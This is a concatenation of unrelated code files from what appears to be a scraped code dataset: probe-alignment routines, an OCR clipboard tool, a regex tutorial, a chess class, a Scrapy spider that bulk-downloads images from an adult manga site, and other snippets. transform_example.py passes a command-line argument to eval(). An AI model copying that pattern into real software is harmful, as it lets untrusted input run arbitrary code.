np.array\r\n \"\"\"\r\n fcn = scipy.interpolate.interp1d(track, feature, fill_value=\"extrapolate\")\r\n return fcn(ft)\r\n\r\n @staticmethod\r\n def feature2track_lin(trk, feature, track):\r\n \"\"\"\r\n Estimate new values of trk according to linear fit between feature and track space, only\r\n implemented if no. of reference points >= 3\r\n :param trk: points in track space to convert feature space\r\n :type trk: np.array\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. 
of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :return fcn(trk): linear fit values of trk\r\n :type fcn(trk): np.array\r\n \"\"\"\r\n if feature.size >= 5:\r\n fcn_lin = np.poly1d(np.polyfit(feature[1:-1], track[1:-1], 1))\r\n lin_fit = fcn_lin(trk)\r\n else:\r\n lin_fit = 0\r\n return lin_fit\r\n\r\n @staticmethod\r\n def adjust_extremes_uniform(feature, track):\r\n \"\"\"\r\n Change the value of the first and last reference points (non user chosen points) such\r\n that coordinates outside user picked regions are left unchanged\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :return track: reference coordinates in track space with first and last value adjusted\r\n :type track: np.array((n_lines + 2))\r\n \"\"\"\r\n diff = np.diff(feature - track)\r\n track[0] -= diff[0]\r\n track[-1] += diff[-1]\r\n return track\r\n\r\n def adjust_extremes_linear(self, feature, track, extend_feature=1):\r\n \"\"\"\r\n Change the value of the first and last reference points (non user chosen points) such\r\n that coordinates outside user picked regions have a linear fit applied\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :param extend_feature: amount to extend extreme coordinates before applying linear fit\r\n :type extend_feature: float\r\n :return feature: reference coordinates in feature space with first and last value adjusted\r\n :type feature: np.array((n_lines + 2))\r\n :return track: reference coordinates in track space with first and last value adjusted\r\n :type track: np.array((n_lines + 2))\r\n \"\"\"\r\n feature[0] = self.track_extent[0] - extend_feature\r\n feature[-1] = self.track_extent[-1] + extend_feature\r\n extend_track = self.feature2track_lin(feature[[0, -1]], feature, track)\r\n track[0] = extend_track[0]\r\n track[-1] = extend_track[-1]\r\n return feature, track\r\n\r\n def scale_histology_regions(self, feature, track):\r\n \"\"\"\r\n Recompute locations of brain region boundaries using interpolated fit based on reference\r\n lines\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :return region: new coordinates of histology boundaries after applying interpolation\r\n :type region: np.array((n_bound, 2)) n_bound: no. 
of histology boundaries\r\n :return region_label: new coordinates of histology labels positions after applying\r\n interpolation\r\n :type region_label: np.array((n_bound)) of tuples (coordinate - float, label - str)\r\n \"\"\"\r\n region_label = np.copy(self.region_label)\r\n region = self.track2feature(self.region, feature, track) * 1e6\r\n region_label[:, 0] = (self.track2feature(np.float64(region_label[:, 0]), feature,\r\n track) * 1e6)\r\n return region, region_label\r\n\r\n @staticmethod\r\n def get_histology_regions(xyz_coords, depth_coords):\r\n \"\"\"\r\n Find all brain regions and their boundaries along the depth of probe or track\r\n :param xyz_coords: 3D coordinates of points along probe or track\r\n :type xyz_coords: np.array((n_points, 3)) n_points: no. of points\r\n :param depth_coords: depth along probe or track where each xyz_coord is located\r\n :type depth_coords: np.array((n_points))\r\n :return region: coordinates bounding each brain region\r\n :type region: np.array((n_bound, 2)) n_bound: no. of histology boundaries\r\n :return region_label: label for each brain region and coordinate of where to place label\r\n :type region_label: np.array((n_bound)) of tuples (coordinate - float, label - str)\r\n :return region_colour: allen atlas rgb colour for each brain region along track\r\n :type region_colour: np.array((n_bound, 3))\r\n :return region_id: allen atlas id for each brain region along track\r\n :type region_id: np.array((n_bound))\r\n \"\"\"\r\n region_ids = brain_atlas.get_labels(xyz_coords)\r\n region_info = brain_atlas.regions.get(region_ids)\r\n boundaries = np.where(np.diff(region_info.id))[0]\r\n region = np.empty((boundaries.size + 1, 2))\r\n region_label = np.empty((boundaries.size + 1, 2), dtype=object)\r\n region_id = np.empty((boundaries.size + 1, 1), dtype=int)\r\n region_colour = np.empty((boundaries.size + 1, 3), dtype=int)\r\n for bound in np.arange(boundaries.size + 1):\r\n if bound == 0:\r\n _region = np.array([0, boundaries[bound]])\r\n elif bound == boundaries.size:\r\n _region = np.array([boundaries[bound - 1], region_info.id.size - 1])\r\n else:\r\n _region = np.array([boundaries[bound - 1], boundaries[bound]])\r\n _region_colour = region_info.rgb[_region[1]]\r\n _region_label = region_info.acronym[_region[1]]\r\n _region_id = region_info.id[_region[1]]\r\n _region = depth_coords[_region]\r\n _region_mean = np.mean(_region)\r\n region[bound, :] = _region\r\n region_colour[bound, :] = _region_colour\r\n region_id[bound, :] = _region_id\r\n region_label[bound, :] = (_region_mean, _region_label)\r\n\r\n return region, region_label, region_colour, region_id\r\n\r\n def get_scale_factor(self, region):\r\n \"\"\"\r\n Find how much each brain region has been scaled following interpolation\r\n :param region: scaled histology boundaries\r\n :type region: np.array((n_bound, 2)) n_bound: no. of histology boundaries\r\n :return scaled_region: regions that have unique scaling applied\r\n :type scaled_region: np.array((n_scale, 2)) n_scale: no. 
of uniquely scaled regions\r\n :return scale_factor: scale factor applied to each scaled region\r\n :type scale_factor: np.array((n_scale))\r\n \"\"\"\r\n scale = []\r\n for iR, (reg, reg_orig) in enumerate(zip(region, self.region * 1e6)):\r\n scale = np.r_[scale, (reg[1] - reg[0]) / (reg_orig[1] - reg_orig[0])]\r\n boundaries = np.where(np.diff(np.around(scale, 3)))[0]\r\n if boundaries.size == 0:\r\n scaled_region = np.array([[region[0][0], region[-1][1]]])\r\n scale_factor = np.unique(scale)\r\n else:\r\n scaled_region = np.empty((boundaries.size + 1, 2))\r\n scale_factor = []\r\n for bound in np.arange(boundaries.size + 1):\r\n if bound == 0:\r\n _scaled_region = np.array([region[0][0],\r\n region[boundaries[bound]][1]])\r\n _scale_factor = scale[0]\r\n elif bound == boundaries.size:\r\n _scaled_region = np.array([region[boundaries[bound - 1]][1],\r\n region[-1][1]])\r\n _scale_factor = scale[-1]\r\n else:\r\n _scaled_region = np.array([region[boundaries[bound - 1]][1],\r\n region[boundaries[bound]][1]])\r\n _scale_factor = scale[boundaries[bound]]\r\n scaled_region[bound, :] = _scaled_region\r\n scale_factor = np.r_[scale_factor, _scale_factor]\r\n return scaled_region, scale_factor\r\n\r\n def get_channel_locations(self, feature, track, depths=None):\r\n \"\"\"\r\n Gets 3d coordinates from a depth along the electrophysiology feature. 2 steps\r\n 1) interpolate from the electrophys features depths space to the probe depth space\r\n 2) interpolate from the probe depth space to the true 3D coordinates\r\n if depths is not provided, defaults to channels local coordinates depths\r\n \"\"\"\r\n if depths is None:\r\n depths = self.chn_depths / 1e6\r\n # nb using scipy here so we can change to cubic spline if needed\r\n channel_depths_track = self.feature2track(depths, feature, track) - self.track_extent[0]\r\n xyz_channels = histology.interpolate_along_track(self.xyz_track, channel_depths_track)\r\n return xyz_channels\r\n\r\n def get_brain_locations(self, xyz_channels):\r\n \"\"\"\r\n Finds the brain regions from 3D coordinates of electrode locations\r\n :param xyz_channels: 3D coordinates of electrodes on probe\r\n :type xyz_channels: np.array((n_elec, 3)) n_elec: no. of electrodes (384)\r\n :return brain_regions: brain region object for each electrode\r\n :type dict\r\n \"\"\"\r\n brain_regions = brain_atlas.regions.get(brain_atlas.get_labels(xyz_channels))\r\n return brain_regions\r\n\r\n def get_perp_vector(self, feature, track):\r\n \"\"\"\r\n Finds the perpendicular vector along the trajectory at the depth of reference lines\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. 
of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_line+2))\r\n :return slice_lines: coordinates of perpendicular lines\r\n :type slice_lines: np.array((n_lines, 2))\r\n \"\"\"\r\n\r\n slice_lines = []\r\n for line in feature[1:-1]:\r\n depths = np.array([line, line + 10 / 1e6])\r\n xyz = self.get_channel_locations(feature, track, depths)\r\n\r\n extent = 500e-6\r\n vector = np.diff(xyz, axis=0)[0]\r\n point = xyz[0, :]\r\n vector_perp = np.array([1, 0, -1 * vector[0] / vector[2]])\r\n xyz_per = np.r_[[point + (-1 * extent * vector_perp)],\r\n [point + (extent * vector_perp)]]\r\n slice_lines.append(xyz_per)\r\n\r\n return slice_lines\r\n","sub_path":"ibllib/pipes/ephys_alignment.py","file_name":"ephys_alignment.py","file_ext":"py","file_size_in_byte":15958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"218797190","text":"from transform import *\nimport numpy as np\nimport cv2\nimport argparse\n\n#constructing an argparse\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\" , \"--image\" ,help = \"path to the image to be transformed\")\nap.add_argument(\"-c\" , \"--coordinates\",\n help = 'coordiantes of the image you perspective changed')\nargs = vars(ap.parse_args())\nimage = cv2.imread(args[\"image\"])\npts = np.array(eval(args[\"coordinates\"]), dtype ='float32')\nwarped = four_point_transform(image, pts)\ncv2.namedWindow('image', cv2.WINDOW_NORMAL)\ncv2.imshow('image' , warped)\ncv2.waitKey(0)\n","sub_path":"top_to_bottom perspective transform/transform_example.py","file_name":"transform_example.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"590962187","text":"import pyperclip\r\nimport pytesseract\r\nfrom PIL import ImageGrab\r\nfrom PIL import Image #Image is required to load input image in PIL format\r\nimport pytesseract #pytesseract is used to recognise the text from image \r\nimport imagehash\r\nfrom win10toast import ToastNotifier\r\n\r\n\r\ndef run_ocr(image_file):\r\n pytesseract.pytesseract.tesseract_cmd='C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe' # specifying the path to the tesseract.exe file\r\n img = Image.open(image_file) # accessing the image \r\n output_text = pytesseract.image_to_string(img) # converting the image contents to string\r\n # print(output_text) # printing the image contents in terminal\r\n return output_text\r\n\r\n\r\ndef compare_img(im1, im2):\r\n if im1 == None or im2 == None:\r\n return False\r\n\r\n h1 = imagehash.average_hash(im1)\r\n h2 = imagehash.average_hash(im2)\r\n\r\n if abs(h1 - h2) == 0:\r\n return True # images are same\r\n else:\r\n return False\r\n\r\n\r\ndef toast_notif(text):\r\n '''Toast a notification in Windows10'''\r\n notif = ToastNotifier()\r\n notif.show_toast(\"SnapBoard OCR\", text)\r\n\r\n\r\nimage_file = 'snap.png'\r\n\r\n# img = ImageGrab.grabclipboard()\r\n# img.save(image_file,'PNG')\r\n\r\n# text = run_ocr(image_file)\r\n\r\n# pyperclip.copy(text)\r\n\r\n# print(text)\r\n\r\nprev_img = None\r\n\r\nwhile True:\r\n img = ImageGrab.grabclipboard()\r\n # print(img)\r\n\r\n if img == None:\r\n continue\r\n\r\n if compare_img(img, prev_img) == False:\r\n img.save(image_file,'PNG')\r\n text = run_ocr(image_file)\r\n pyperclip.copy(text)\r\n print(text)\r\n toast_notif(text)\r\n prev_img = 
img\r\n\r\n\r\n","sub_path":"imageconvertor.py","file_name":"imageconvertor.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483348476","text":"# this is saveSurfaces.py\ns = SaveWindowAttributes()\ns.format, s.fileName = s.PNG, 'iso'\ns.outputToCurrentDirectory = 0\ns.outputDirectory = \"/Users/razoumov/Documents/teaching/visitWorkshop\"\nSetSaveWindowAttributes(s)\nfor i in range(3):\n isoAtts.contourValue = 2. + i*1.5\n SetOperatorOptions(isoAtts)\n name = SaveWindow()\n","sub_path":"scripts/saveSurfaces.py","file_name":"saveSurfaces.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"595542685","text":"# -*- comding:utf-8 -*-\ndef testzz_z():\n ''' 正则学习 '''\n import re\n #findall 匹配一个列表\n #search,match 匹配一次之后就不匹配了match类型,search匹配有很多正则比较好\n s = '13978962341asdad1497896232212313asdad 0123-67823456 very very vary 192.168.213.123'\n\n n = re.findall(r'1\\d{10}', s )\n print(\"正则取出来的值:\",n , \"他的格式:\", type(n))\n print('取列表第一个:',n[0], type(n[0]))\n\n print('--'*10)\n\n b = re.search(r'1\\d{10}', s) #1开头,后面10位\n print(\"正则取出来的值:\", b ,\"他的格式:\", type(b))\n print('只取一次:', b.group(),type(b.group()))\n\n print('--' * 10)\n m = re.findall(r'\\d{3,4}-\\d{7,8}', s) #前面3-4位数字,后面7-8位数字\n print(m)\n\n print('--' * 10)\n w = re.findall(r'(14|13)\\d{9}', s) #['13', '14']\n w1 = re.search(r'(14|19)\\d{9}', s) #<_sre.SRE_Match object; span=(16, 27), match='14978962322'>\n w2 = re.match(r'(14|19)\\d{9}', s)\n print(w,w1,w2)\n\n print('--' * 10)\n m = re.findall(r'(very)\\s+\\1', s) #['very']\n m1 = re.search(r'(very)\\s+\\1', s) #<_sre.SRE_Match object; span=(54, 63), match='very very'>\n m2 = re.match(r'(very)\\s+\\1', s)\n print(m,m1,m2)\n\n print('--' * 10)\n m = re.findall(r'1\\d{10}(?=123)', s) #断言,判断后面一定有123\n print(m)\n\n print('--' * 10)\n m = re.findall(r'(?:(\\d{1,3}).){3}(\\d{1,3})', s)\n m1 = re.search(r'(?:(\\d{1,3}).){3}(\\d{1,3})', s)\n m2 = re.match(r'(very)\\s+\\1', s)\n print(m)\n print(m1)\n \ndef test_pkip():\n #匹配合法的ip地址\n line = \"\"\"\\\n 192.168.1.150\n 0.0.0.0\n 255.255.255.255\n 17.16.52.100\n 172.16.0.100\n 400.400.999.888\n 001.022.003.000\n 257.257.255.256 \"\"\"\n\n\n import socket\n for i,ip in enumerate(line.splitlines()):\n print(ip)\n try:\n net = socket.inet_aton(ip)\n except Exception as e :\n print(i , ip , e)\n print(i, net)\nimport re\ndef tes_ftp():\n #选出含有ftp的链接,且文件类型是gz或者xz的文件名\n s = 'http://ftp.altlinux.org/pub/people/legion/kbd/kbd-1.15.5.tar.gz'\n m = re.findall(r'ftp.*/(.*\\.(?:gz|xz))', s)\n print(m)\n\n\ndef test_zzzz():\n test = '''agsodahkjsd\\nasbdas\\nasda\\wqeq\\nAppLE'''\n\n #每次执行编译一次\n matcher = re.match('ags', test, re.I) \n print(matcher)\n\n print('---'*10)\n\n #先编译,然后执行\n regex = re.compile('b.+', re.S) #re.S 多行 re.I 忽略大小写 re.M 从多行查找,如果指定了第几位会找不到后面的数据\n matcher = regex.match(test) # 第一个参数,是从什么文本查找\n print(matcher)\n print('---'*10)\n\n\n matcher = regex.search(test, 8) #第二个参数是从多少位开始查找 \n print(matcher)\n print('---'*10)\n\n matcher = regex.fullmatch(test, 9,25) #全匹配\n print(matcher)\n print('---'*10)\n\n\n matcher = re.findall('b.+', test) #全文匹配\n print(matcher)\n print('---'*10)\n\n\n matcher = re.finditer('b.+', test) #全文匹配\n print(matcher)\n print('---'*10)\n\n\n\n\n #匹配后替换参数sub\n #匹配正则,替换内容,文本内容,替换次数,立即替换\n print(re.sub('a\\w+d', 'www', test, 10).encode())\n print('---'*10)\n\n #n 的意思是,返回替换成功的值并告诉你替换了几次\n print(re.subn('a\\w+d', 'www', test, 10))\n 
print('---'*10)\n\n #正则提取分隔\n test = '''asda\\n\\t (baf)\\nasd'''\n regex = re.compile('[\\s()]+') #空格分隔\n print(regex.split(test))\n\n\n #带有空格,数字等,切割\n test = '''01 asda\n 123 asda\n 12 asda \n 100 asdas'''\n regex = re.compile('\\s+\\d+\\s+') #空格分隔\n print(regex.split(test))\n\n regex = re.compile('^\\d+\\s+|\\s+\\d+\\s+') #空格分隔\n print(regex.split(test))\n\n\n\n# match、search函数可以返回match对象;findall返回字符串列表;finditer返回一个个match对象\n# 如果pattern中使用了分组,如果有匹配的结果,会在match对象中\n# 1. 使用group(N)方式返回对应分组,1到N是对应的分组,0返回整个匹配的字符串\n# 2. 如果使用了命名分组,可以使用group('name')的方式取分组\n# 3. 也可以使用groups()返回所有组\n# 4. 使用groupdict() 返回所有命名的分组\n\n\n #匹配邮箱地址\n\n testeail = '''\n test@hot-mail.com\n v-ip@magedu.com\n web.manager@magedu.com.cn\n super.user@google.com\n ashdajjlkj@163.com\n ahsdkl@qq.com\n qweiqpowei@aadsad.cn\n 123981273981@qq.com\n a@w-a-com\n '''\n regex = re.compile(r'[-\\w.]+@[-\\w.]+\\.\\w+') \n matcher = regex.findall(testeail) \n print(matcher)\n\n #匹配html标记内的内容\n\n\n str1 = \"\"\"马哥教育\n \n \"\"\"\n\n regex = re.compile(r']*>(.*)') #<(div)[^<>]*>( .*) 分组div 变量第一个分组\\1 ,可以改a,或者其他标签\n matcher = regex.findall(str1) \n print(matcher)\n\n\n #匹配URL\n\n testurl = '''\n http://www.magedu.com/index.html\n https://login.magedu.com\n file:///ect/sysconfig/network\n '''\n regex = re.compile(r'[a-zA-Z]+://[^\\s]*[.com|.cn]') \n matcher = regex.findall(testurl) \n print(matcher)\n\n\n #匹配二代中国身份证ID\n testid = '''\n 321105700101003\n 321105197001010030\n 11210020170101054X\n 17位数字+1位校验码组成\n 前6位地址码,8位出生年月,3位数字,1位校验位(0-9或X)\n '''\n regex = re.compile(r'\\d{17}[\\dxX]|\\d{15}') \n matcher = regex.findall(testid) \n print(matcher)\n\n #判断密码强弱\n # 要求密码必须由 10-15位 指定字符组成:\n # 十进制数字\n # 大写字母\n # 小写字母\n # 下划线\n # 要求四种类型的字符都要出现才算合法的强密码\n # 例如:Aatb32_67mnq,其中包含大写字母、小写字母、数字和下划线,是合格的强密码\n testsfz = ''' Aatb32_67mnq\n '''\n\n regex = re.compile(r'^[a-zA-Z0-9_]{10,15}$') \n matcher = regex.findall(testsfz) \n print(matcher)\n\n\n# //密码强弱程度(我把原来正则表达式后面的g都去掉了)\n# //弱\n# var week = /^([a-zA-Z]){6,16}$|^(\\d){6,16}$|^((?=[\\x21-\\x7e]+)[^A-Za-z0-9]){6,16}$|^(?!\\2+$)(?!\\1+$)[\\2\\1]{6,7}$|^(?!\\3+$)(?!\\1+$)[\\3\\1]{6,7}$|^(?!\\3+$)(?!\\2+$)[\\2\\3]{6,7}$|^(?=.*\\3)(?=.*\\1)(?=.*\\2)[a-zA-Z\\x21-\\x7e\\d]{6,7}$/;\n# //中:字母+数字\n# var middle1 = /^(?!\\d+$)(?![a-zA-Z]+$)[\\dA-Za-z]{8,16}$/;\n# //中:字母+字符\n# var middle2 = /^(?!((?=[\\x21-\\x7e]+)[^A-Za-z0-9])+$)(?![a-zA-Z]+$)[^\\u4e00-\\u9fa5\\d]{8,16}$/;\n# //中:数字+字符\n# var middle3 = /^(?!((?=[\\x21-\\x7e]+)[^A-Za-z0-9])+$)(?!\\d+$)[^\\u4e00-\\u9fa5a-zA-Z]{8,16}$/;\n# //强\n# var strong = /^(?=.*((?=[\\x21-\\x7e]+)[^A-Za-z0-9]))(?=.*[a-zA-Z])(?=.*[0-9])[^\\u4e00-\\u9fa5]{8,13}$/;\n# //最强\n# var strongest = /^(?=.*((?=[\\x21-\\x7e]+)[^A-Za-z0-9]))(?=.*[a-zA-Z])(?=.*[0-9])[^\\u4e00-\\u9fa5]{14,16}$/;\n\n\n\n\n\n# 1、用户名正则\n\n# //用户名正则,4到16位(字母,数字,下划线,减号)\n# var uPattern = /^[a-zA-Z0-9_-]{4,16}$/;\n\n# 2、Email正则\n\n# //Email正则\n# var ePattern = /^([A-Za-z0-9_\\-\\.])+\\@([A-Za-z0-9_\\-\\.])+\\.([A-Za-z]{2,4})$/;\n\n# 3、手机号正则\n\n# //手机号正则\n# var mPattern = /^((13[0-9])|(14[5|7])|(15([0-3]|[5-9]))|(18[0,5-9]))\\d{8}$/;\n\n# 4、身份证正则\n\n# //身份证号(18位)正则\n# var cP = /^[1-9]\\d{5}(18|19|([23]\\d))\\d{2}((0[1-9])|(10|11|12))(([0-2][1-9])|10|20|30|31)\\d{3}[0-9Xx]$/;\n# 5、IPV4地址正则\n\n# //ipv4地址正则\n# var ipP = /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/;\n# 6、QQ号正则\n\n# //QQ号正则,5至11位\n# var qqPattern = /^[1-9][0-9]{4,10}$/;\n\n# 7、微信号正则\n\n# //微信号正则,6至20位,以字母开头,字母,数字,减号,下划线\n# var wxPattern = /^[a-zA-Z]([-_a-zA-Z0-9]{5,19})+$/;\n\n# 8、车牌号正则\n\n# //车牌号正则\n# var 
cPattern = /^[京津沪渝冀豫云辽黑湘皖鲁新苏浙赣鄂桂甘晋蒙陕吉闽贵粤青藏川宁琼使领A-Z]{1}[A-Z]{1}[A-Z0-9]{4}[A-Z0-9挂学警港澳]{1}$/;\n\n# 9、包含中文正则\n\n# //包含中文正则\n# var cnPattern = /[\\u4E00-\\u9FA5]/;\n\n\n\n # #单词统计\n\n chekword = '''\\\n host\n maowe\n asdaksd\n host\n '''\n regex = re.compile('[^\\w-]+') \n def makekey3(line:str):\n for word in regex.split(line):\n if len(word):\n yield word\n\n for i in makekey3(chekword):\n print(i)\n\n\n\n# 邮箱\n# \\w+[-. \\w]*@[\\w-]+(\\.[\\w-]+)+\n# html提取\n# <[^<>]+>(.*)<[^<>]+>\n# 如果要���配标记a\n# r'<(\\W+)[^<>]+>(.*)()'\n# URL提取\n# (\\w+)://([^\\s]+)\n# 身份证验证\n# 身份证验证需要使用公式计算,最严格的应该实名验证。\n# \\d{17}[0-9xX]|\\d{15}\n# 强密码\n# Aatb32_ _67mnq\n# Aatb32_ _67m. nq\n# 中国是一个伟大的国家aA_ 8\n# 10-15位,其中包含大写字母、小写字母、数字和下划线\n# ^\\W{10,15}$\n# 如果测试有不可见字符干扰使用^\\W{10,15}\\r?$\n# 看似正确,但是,如果密码有中文呢?\n# ^[a-ZA-Z0-9_ ]{10,15}$\n\n\n","sub_path":"mag363/Completed/200829_re.py","file_name":"200829_re.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"454787853","text":"WHITE = 0\nBLACK = 1\n\nblack = lambda x: \"\\033[38;5;0m\" + x + \"\\033[0m\"\nwhite = lambda x: \"\\033[38;5;15m\" + x + \"\\033[0m\"\n\n\nclass Piece(object):\n '''Class for chess pieces'''\n\n def __init__(self, board, color, position):\n '''__init__(board, color, position)\n\n 'board' is a Board object\n 'color' is an integer, 1 for black, 0 for white\n 'position' is an integer tuple like (1, 3) or (3, 5) for default\n '''\n self.color = color\n self.position = position\n\n def get_name(self):\n '''get_name()\n\n Return piece's name.\n '''\n return self.name\n\n def get_color(self):\n '''get_color()\n\n Return piece's color.\n '''\n return self.color\n\n def get_position(self):\n '''get_position()\n\n Return piece's position.\n '''\n return self.position\n\n def move(self, board, position):\n '''move(board, position) -> bool\n\n 'board' is a Board object\n 'position' is an integer tuple like (1, 3)\n\n Move piece to 'position'. 
Return True on success, False otherwise.\n '''\n if position in self.possible_moves:\n if board.is_empty(position):\n board.remove_piece(self.position)\n self.position = position\n board.place_piece(self, position)\n return True\n elif board.is_enemy(position, self.color):\n self.attack(board, position)\n return True\n else:\n return False\n else:\n return False\n\n def attack(self, board, position):\n '''attack(board, position)\n\n 'board' is a Board object\n 'position' is an integer tuple like (1, 3)\n\n Attack given 'position'.\n '''\n board.remove_piece(position)\n self.move(board, position)\n\n def calculate_possibles(self, board):\n '''calculate_possibles(board)\n\n 'board' is a Board object\n\n Calculate the set of possible moves.\n '''\n raise NotImplementedError(\"This is the parent.\")\n\n def check(self, board):\n '''check(board)\n\n 'board' is a Board object\n\n Check if the opponent's king is in check.\n '''\n if self.color == WHITE:\n opponent = black\n else:\n opponent = white\n\n for move in self.possible_moves:\n if not board.is_empty(move):\n if board.get_piece(move).get_name() == opponent(\"K\"):\n return True\n\n return False\n","sub_path":"piece.py","file_name":"piece.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"558269336","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport requests\nfrom animezilla_18h.items import Animezilla18HItem\n\nclass Spider18hSpider(scrapy.Spider):\n name = 'Spider_18h'\n allowed_domains = ['18h.animezilla.com']\n start_urls = []\n #for url in open(r'D:\\Spider_download\\animezilla_18h_images\\1.txt'): \n #url = \"'\"+url.strip()+\"'\"\n #print(url) \n #start_urls.append(url)\n for i in range(80,100):\n url = 'https://18h.animezilla.com/manga/'+str(i)\n r = requests.get(url)\n if r.status_code == 200:\n print('%s yes!!!'%url)\n start_urls.append(url)\n\n def parse(self, response):\n #comicname is the comic's title\n #page is the current page number\n #page_num is the comic's total page count\n a = response.css('.entry-header h1::text').extract_first()\n b = a.split(' ')\n c = len(b)\n comicname = ''\n for i in range(0,c-2):\n comicname = comicname + b[i]\n pageinfo = b[c-1]\n page = pageinfo.split('/')[0]\n page_num = pageinfo.split('/')[1]\n print(comicname)\n\n i = 1\n while i <= int(page_num):\n url = response.url+'/'+str(i)\n yield scrapy.Request(url = url,callback=self.parse_image,meta={'comicname':comicname,'page':i})\n i+=1\n\n def parse_image(self, response):\n item = Animezilla18HItem()\n item['image_urls'] = [response.css('.entry-content p img::attr(src)').extract_first()]\n item['image_name'] = response.meta['comicname']\n item['page'] = response.meta['page']\n item['url'] = response.url\n #print(item['image_name']+item['image_urls'])\n yield item\n ","sub_path":"animezilla_18h/spiders/Spider_18h.py","file_name":"Spider_18h.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546060636","text":"# Andy, Ben and Charlotte are playing a board game. The three of them decided to\n# come up with a new scoring system. A player's first initial (\"A\", \"B\" or \"C\")\n# denotes a single point scored by that player. Given a string of capital letters,\n# return a list of the players' scores.\n# For instance, if ABBACCCCAC is written when the game is over, then Andy scored\n# 3 points, Ben scored 2 points, and Charlotte scored 5 points, since there are 3\n# instances of letter A, 2 instances of letter B, and 5 instances of letter C.\n# So the list [3, 2, 5] should be returned.\n# If given an empty string as an input, return [0, 0, 0].\n\ndef calculate_scores(txt):\n result = [0, 0, 0]\n for x in txt:\n if x == 'A':\n result[0] += 1\n elif x == 'B':\n result[1] += 1\n elif x == 'C':\n result[2] += 1\n return result\n\n\n\nprint(calculate_scores(\"A\")) #➞ [1, 0, 0]\nprint(calculate_scores(\"ABC\")) #➞ [1, 1, 1]\nprint(calculate_scores(\"ABCBACC\")) #➞ [2, 2, 3]\n","sub_path":"python-katas/EdabCalcScores.py","file_name":"EdabCalcScores.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"516252869","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Invenio.\n# Copyright (C) 2016-2019 CERN.\n#\n# Invenio is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Module tests.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nfrom invenio_records.api import Record\n\nfrom invenio_communities.models import InclusionRequest\n\n\ndef test_community_delete_task(app, db, communities):\n \"\"\"Test the community deletion task.\"\"\"\n (comm1, comm2, comm3) = communities\n communities_key = app.config[\"COMMUNITIES_RECORD_KEY\"]\n rec1 = Record.create({'title': 'Foobar'})\n InclusionRequest.create(community=comm1, record=rec1, notify=False)\n\n assert InclusionRequest.get(comm1.id, rec1.id)\n\n comm1.accept_record(rec1)\n assert 'comm1' in rec1[communities_key]\n\n comm1.delete()\n assert comm1.is_deleted\n","sub_path":"tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"116688089","text":"__author__ = 'patras'\n\nfrom domain_springDoor import *\nfrom timer import DURATION\nfrom state import state, rv\n\nDURATION.TIME = {\n 'unlatch1': 5,\n 'unlatch2': 5,\n 'holdDoor': 2,\n 'passDoor': 3,\n 'releaseDoor': 2,\n 'closeDoors': 3,\n 'move': 7,\n 'take': 2,\n 'put': 2,\n}\n\nDURATION.COUNTER = {\n 'unlatch1': 5,\n 'unlatch2': 5,\n 'holdDoor': 2,\n 'passDoor': 3,\n 'releaseDoor': 2,\n 'closeDoors': 3,\n 'move': 7,\n 'take': 2,\n 'put': 2,\n}\n\nrv.LOCATIONS = [1, 2, 3, 4, 5, 6, 7]\nrv.EDGES = {1: [7], 2: [6, 7], 3: [7], 4: [5], 5: [4, 6, 7], 6: [2, 5], 7: [1, 2, 3, 5]}\nrv.DOORS = ['d1', 'd2', 'd3']\nrv.DOORLOCATIONS = {(1, 7): 'd1', (2, 7): 'd2', (5, 6): 'd3'}\nrv.DOORTYPES = {'d1': 'spring', 'd2': 'spring', 'd3': 'spring'}\nrv.ROBOTS = ['r1', 'r2', 'r3', 'r4']\n\ndef ResetState():\n state.load = {'r1': NIL, 'r2': NIL, 'r3': NIL, 'r4': NIL}\n state.status = {'r1': 'free', 'r2': 'free', 'r3': 'free', 'r4': 'free'}\n state.loc = {'r1': 1, 'r2': 2, 'r3': 2, 'r4': 7}\n state.pos = {'o1': 3}\n state.doorStatus = {'d1': 